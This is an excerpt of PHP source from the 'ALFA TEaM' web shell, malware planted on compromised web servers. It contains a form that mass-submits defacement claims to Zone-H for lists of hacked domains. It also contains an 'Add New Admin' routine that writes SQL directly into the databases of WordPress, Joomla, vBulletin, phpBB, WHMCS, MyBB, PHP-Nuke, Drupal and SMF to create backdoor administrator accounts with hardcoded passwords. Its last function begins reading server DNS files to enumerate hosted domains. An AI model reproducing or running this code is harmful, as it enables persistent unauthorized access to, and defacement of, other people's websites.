4167$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
4168$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
4169echo '
4170<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
4171<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
4172<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
4173<br>
4174<select id="text" name="hackmode" style="width:400px;">';
4175$x=1;
4176foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4177echo '</select><br><select id="text" name="reason" style="width:200px;">';
4178$x=1;
4179foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4180echo '</select><br>
4181<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
4182<p><input type="submit" value=" " name="go" /></p>
4183</form></center>';
4184if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
4185ob_start();
4186$hacker = $_POST['alfa1'];
4187$method = $_POST['alfa2'];
4188$neden = $_POST['alfa3'];
4189$site = $_POST['alfa4'];
4190if(empty($hacker)){
4191die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
4192}elseif($method == "------------------------------------SELECT-------------------------------------"){
4193die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
4194}elseif($neden == "------------------------------------SELECT-------------------------------------"){
4195die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
4196}elseif(empty($site)){
4197die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
4198}
4199$i = 0;
4200$sites = explode("\n", $site);
4201$alfa = new AlfaCURL();
4202while($i < count($sites)){
4203if(substr($sites[$i], 0, 4) != "http"){
4204$sites[$i] = "http://".$sites[$i];
4205}
4206$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
4207++$i;
4208}
4209echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
4210}
4211echo "</div>";
4212alfafooter();
4213}
4214function alfapwchanger(){
4215alfahead();
4216
4217echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
4218<center><h3>';
4219$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
4220Alfa_Create_A_Tag('pwchanger',$vals);
4221echo '</h3></center>';
4222if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
4223
4224echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
4225<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4226$table = array('td1' =>
4227 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4228 'td2' =>
4229 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4230 'td3' =>
4231 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4232 'td4' =>
4233 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4234 'td5' =>
4235 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
4236 'td6' =>
4237 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4238 'td7' =>
4239 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4240 'td8' =>
4241 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4242);
4243create_table($table);
4244echo '<p><input value=" " name="send" type="submit"></p></form>';
4245if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
4246$localhost = $_POST['alfa3'];
4247$database = $_POST['alfa4'];
4248$username = $_POST['alfa5'];
4249$password = $_POST['alfa6'];
4250$admin = $_POST['alfa8'];
4251$SQL = $_POST['alfa9'];
4252$prefix = $_POST['alfa10'];
4253$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4254$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
4255$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
4256$sole = @mysqli_num_rows($solevisible);
4257if ($sole == 1){
4258$solevis = @mysqli_fetch_assoc($solevisible);
4259$res = $solevis['ID'];
4260}
4261$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
4262if($solevisible){
4263__alert('Success... '.$admin.' is created...');}
4264}
4265}
4266if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
4267
4268echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4269$table = array('td1' =>
4270 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4271 'td2' =>
4272 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4273 'td3' =>
4274 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4275 'td4' =>
4276 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4277 'td5' =>
4278 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
4279 'td6' =>
4280 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4281 'td7' =>
4282 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4283 'td8' =>
4284 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4285);
4286create_table($table);
4287echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4288if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4289$localhost = $_POST['alfa3'];
4290$database = $_POST['alfa4'];
4291$username = $_POST['alfa5'];
4292$password = $_POST['alfa6'];
4293$admin = $_POST['alfa8'];
4294$SQL = $_POST['alfa9'];
4295$prefix = $_POST['alfa10'];
4296$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4297$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4298$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
4299$sole =@mysqli_num_rows($solevisible);
4300if ($sole == 1){
4301$solevis =@mysqli_fetch_assoc($solevisible);
4302$res = $solevis['id'];
4303}
4304$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
4305if($solevisible){
4306__alert('Success... '.$admin.' is created...');}
4307}
4308}
4309if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
4310
4311echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
4312$table = array('td1' =>
4313 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4314 'td2' =>
4315 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4316 'td3' =>
4317 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4318 'td4' =>
4319 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4320 'td5' =>
4321 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4322 'td6' =>
4323 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4324 'td7' =>
4325 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4326 'td8' =>
4327 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4328);
4329create_table($table);
4330echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4331if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4332$localhost = $_POST['alfa2'];
4333$database = $_POST['alfa3'];
4334$username = $_POST['alfa5'];
4335$password = $_POST['alfa6'];
4336$prefix = $_POST['alfa7'];
4337$admin = $_POST['alfa8'];
4338$SQL = $_POST['alfa9'];
4339$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4340$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
4341$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
4342$sole = mysqli_num_rows($solevisible);
4343if($sole == 1){
4344$solevis = mysqli_fetch_assoc($solevisible);
4345$res = $solevis['userid'];
4346}
4347$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
4348if($solevisible){
4349__alert('Success... '.$admin.' is created...');}
4350}
4351}
4352if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
4353
4354echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4355$table = array('td1' =>
4356 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4357 'td2' =>
4358 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4359 'td3' =>
4360 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4361 'td4' =>
4362 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4363 'td5' =>
4364 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4365 'td6' =>
4366 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4367 'td7' =>
4368 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4369 'td8' =>
4370 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4371);
4372create_table($table);
4373echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4374if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4375$localhost = $_POST['alfa2'];
4376$database = $_POST['alfa3'];
4377$username = $_POST['alfa4'];
4378$password = $_POST['alfa6'];
4379$admin = $_POST['alfa8'];
4380$SQL = $_POST['alfa9'];
4381$prefix = $_POST['alfa10'];
4382$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4383$hash = md5('solevisible');
4384$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4385$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4386$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
4387$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
4388$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
4389if($solevisible){
4390__alert('Success... '.$admin.' is created...');
4391}
4392}
4393}
4394if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
4395
4396echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
4397$table = array('td1' =>
4398 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4399 'td2' =>
4400 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4401 'td3' =>
4402 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4403 'td4' =>
4404 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4405 'td6' =>
4406 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4407 'td7' =>
4408 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4409 'td8' =>
4410 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4411);
4412create_table($table);
4413echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4414if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4415$localhost = $_POST['alfa2'];
4416$database = $_POST['alfa3'];
4417$username = $_POST['alfa4'];
4418$password = $_POST['alfa5'];
4419$admin = $_POST['alfa8'];
4420$SQL = $_POST['alfa9'];
4421$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4422$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
4423if($solevisible){
4424__alert('Success... '.$admin.' is created...');}
4425}
4426}
4427if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
4428
4429echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4430$table = array('td1' =>
4431 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4432 'td2' =>
4433 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4434 'td3' =>
4435 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4436 'td4' =>
4437 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4438 'td5' =>
4439 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4440 'td6' =>
4441 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4442 'td7' =>
4443 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4444 'td8' =>
4445 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4446);
4447create_table($table);
4448echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4449if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4450$localhost = $_POST['alfa2'];
4451$database = $_POST['alfa3'];
4452$username = $_POST['alfa4'];
4453$password = $_POST['alfa5'];
4454$admin = $_POST['alfa8'];
4455$SQL = $_POST['alfa9'];
4456$prefix = $_POST['alfa10'];
4457$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4458$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
4459if($solevisible){
4460__alert('Success... '.$admin.' is created...');}
4461}
4462}
4463if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
4464
4465echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
4466$table = array('td1' =>
4467 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4468 'td2' =>
4469 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4470 'td3' =>
4471 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4472 'td4' =>
4473 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4474 'td5' =>
4475 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4476 'td6' =>
4477 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4478 'td7' =>
4479 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4480 'td8' =>
4481 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4482);
4483create_table($table);
4484echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4485if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4486$localhost = $_POST['alfa2'];
4487$database = $_POST['alfa3'];
4488$username = $_POST['alfa4'];
4489$password = $_POST['alfa5'];
4490$admin = $_POST['alfa7'];
4491$SQL = $_POST['alfa9'];
4492$prefix = $_POST['alfa10'];
4493$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4494$hash = md5($pwd);
4495$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4496if($solevisible){
4497__alert('Success... '.$admin.' is created...');}
4498}
4499}
4500if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
4501
4502echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
4503$table = array('td1' =>
4504 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4505 'td2' =>
4506 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4507 'td3' =>
4508 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4509 'td4' =>
4510 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4511 'td6' =>
4512 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4513 'td7' =>
4514 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
4515 );
4516create_table($table);
4517echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4518if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4519$localhost = $_POST['alfa2'];
4520$database = $_POST['alfa4'];
4521$username = $_POST['alfa5'];
4522$password = $_POST['alfa6'];
4523$admin = $_POST['alfa8'];
4524$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4525$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
4526$getDescuid = @mysqli_fetch_assoc($getDescuid);
4527$getDescuid = $getDescuid['uid'];
4528$getdescuid = $getDescuid++;
4529$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
4530$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
4531$sole = mysqli_num_rows($solevisible);
4532if ($sole == 1){
4533$solevis = mysqli_fetch_assoc($solevisible);
4534$res = $solevis['uid'];
4535}
4536$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
4537if($solevisible){
4538__alert('Success... '.$admin.' is created...');}
4539}
4540}
4541
4542if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
4543
4544echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
4545$table = array('td1' =>
4546 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4547 'td2' =>
4548 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4549 'td3' =>
4550 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4551 'td4' =>
4552 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4553 'td5' =>
4554 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
4555 'td6' =>
4556 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4557 'td7' =>
4558 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4559 );
4560create_table($table);
4561echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4562if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4563$localhost = $_POST['alfa2'];
4564$database = $_POST['alfa3'];
4565$username = $_POST['alfa5'];
4566$password = $_POST['alfa6'];
4567$prefix = $_POST['alfa7'];
4568$admin = $_POST['alfa8'];
4569$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4570$setpwAlg = sha1(strtolower($admin) . 'solevisible');
4571$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
4572if($solevisible){
4573__alert('Success... '.$admin.' is created...');}
4574}
4575}
4576echo "</div>";
4577alfafooter();
4578}
4579function alfaMakePwd(){
4580 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
4581 return "/home/{user}/public_html/";
4582 }
4583 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
4584 $public = end($document);
4585 array_pop($document);
4586 array_pop($document);
4587 $path = implode("/", $document) . "/{user}/" . $public;
4588 return $path;
4589}
4590function alfaGetDomains($state = false){
4591 $state = "named.conf";
4592 $lines = array();
4593 $lines = _alfa_file('/etc/named.conf');
4594 if(!$lines){
4595 $lines = @scandir("/etc/valiases/");
4596 $state = "valiases";
4597 if(!$lines){
4598 $lines = @scandir("/var/named");
4599 $state = "named";
4600 if(!$lines && $state){
